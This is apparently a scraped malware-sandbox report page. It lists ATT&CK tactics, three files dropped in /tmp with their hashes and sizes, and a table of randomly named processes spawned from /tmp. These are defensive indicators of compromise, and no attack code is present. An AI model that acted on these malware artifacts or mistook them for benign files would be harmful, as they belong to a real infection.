Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit
/tmp/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V

Filesize
555B

MD5
c3da85a3173a4ec9d42682016f6a69e2

SHA1
b644cacfbf06e841788ab8deb5e388ef7ddf982d

SHA256
77df749f6bbe85442500437f7e798f46b9635da344811ae3b4bf7d43048ee9bb

SHA512
ff3c45bb810169a269b1d0edcfc251c2b31e4acaec0acf1f8a561752b261fcba76ad0f5f5b298f64c50afa7ac9b99262b25af161451e83b14b202c8d33f2eaeb

Download Submit
/tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74

Filesize
112KB

MD5
05d7857dcead18bbd86d2935f591873c

SHA1
34d18f41ef35f93d5364ce3e24d74730a4e91985

SHA256
2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70

SHA512
d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e

Download Submit

ioc	pid	Process
/tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74	745	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
/tmp/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V	754	VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
/tmp/MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ	760	MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
/tmp/QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp	777	QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp
/tmp/VAny7AriniG4jyy7II43Ri0DQ1d0whOQs5	798	VAny7AriniG4jyy7II43Ri0DQ1d0whOQs5
/tmp/4LWt5NF1vFsWBm5H1a9V9Koy1DYBNJzq32	823	4LWt5NF1vFsWBm5H1a9V9Koy1DYBNJzq32
/tmp/UFK1aCixdf3UXYbkGRVrbde4PB5uIIoYvO	832	UFK1aCixdf3UXYbkGRVrbde4PB5uIIoYvO
/tmp/vE65LHPHPMX5cIeLQhMj2wvpVb1TliD9F0	838	vE65LHPHPMX5cIeLQhMj2wvpVb1TliD9F0
/tmp/ZpOEGXN1E4YCv82tKGkll6qbQ55jlJ7EjS	858	ZpOEGXN1E4YCv82tKGkll6qbQ55jlJ7EjS
/tmp/RabDggy8GKKnLq1X0GFKabwNiKJCoupOXX	880	RabDggy8GKKnLq1X0GFKabwNiKJCoupOXX
/tmp/9EhhHIjAB1gyIwGkRIniBTLx7xvyQCG8nk	886	9EhhHIjAB1gyIwGkRIniBTLx7xvyQCG8nk
/tmp/jfh5QMoKv9GoFsHjBmvNtTjb62VmZAqUzi	892	jfh5QMoKv9GoFsHjBmvNtTjb62VmZAqUzi
/tmp/N7xXGTYypnkkTR9pohUEu4pnFaXerg6hHn	898	N7xXGTYypnkkTR9pohUEu4pnFaXerg6hHn
/tmp/wqnlxt6Oyi1S4Zu1rse3ElV3dUUXiDjIDL	904	wqnlxt6Oyi1S4Zu1rse3ElV3dUUXiDjIDL
/tmp/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V	910	VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
/tmp/MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ	916	MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
/tmp/QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp	922	QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp
/tmp/VAny7AriniG4jyy7II43Ri0DQ1d0whOQs5	928	VAny7AriniG4jyy7II43Ri0DQ1d0whOQs5
/tmp/4LWt5NF1vFsWBm5H1a9V9Koy1DYBNJzq32	934	4LWt5NF1vFsWBm5H1a9V9Koy1DYBNJzq32
/tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74	940	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
/tmp/vE65LHPHPMX5cIeLQhMj2wvpVb1TliD9F0	946	vE65LHPHPMX5cIeLQhMj2wvpVb1TliD9F0
/tmp/ZpOEGXN1E4YCv82tKGkll6qbQ55jlJ7EjS	952	ZpOEGXN1E4YCv82tKGkll6qbQ55jlJ7EjS
/tmp/UFK1aCixdf3UXYbkGRVrbde4PB5uIIoYvO	958	UFK1aCixdf3UXYbkGRVrbde4PB5uIIoYvO
/tmp/RabDggy8GKKnLq1X0GFKabwNiKJCoupOXX	964	RabDggy8GKKnLq1X0GFKabwNiKJCoupOXX